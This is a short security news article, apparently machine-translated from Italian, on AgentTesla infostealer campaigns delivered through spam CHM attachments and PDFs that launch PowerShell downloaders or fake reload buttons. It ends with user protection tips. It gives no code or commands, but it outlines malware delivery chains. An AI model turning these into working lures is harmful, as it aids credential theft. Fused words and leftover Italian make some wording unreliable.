According to the findings of CRILthe well-known infostealer AgentTesla has adopted new diffusion strategies, which exploit files with the extension CHM e PDF.
Il malwareequipped with several dangerous features such as keyloggingthe possible access to file systems and the ability to transfer data to a command and control serverwould therefore have been strengthened by its creators.
In the case of CHM files, the infection starts from ae-mail the spam. The file in question serves as bait and once it is activated it executes one script PowerShell without the knowledge of the victim. This installs malicious code, which in turn downloads a file DLL based on framework .NET which starts the actual infection.
The situation, in the case of PDF files, is very different.
AgentTesla, CHM and PDF files: how to avoid disasters?
In this case, this PDF uses two different strategies to spread the infection. In the first technique, the PDF triggers a PowerShell command that loads the AgentTesla malware more directly.
The second technique shows a sort of error message when the victim tries to access the PDF. At the time of the error a button to reload the document: this, in reality, downloads a file PPAM. The latter performs PowerShell operations that download AgentTesla.
To prevent infection by this infostealer, experts have provided several useful tips to users.
Apply effective solutions in the context of email filtering, for example, is essential to avoid real disasters. This way you can block spam, scams, phishing e malicious attachments without too much effort.
Avoid clic su link of dubious origin and the download in file from potentially suspicious emails, is another way to protect your devices. Finally, adopt a suite antivirus being up to the situation and always kept up to date, it can further help to limit the dangers linked to these infostealers (and not only).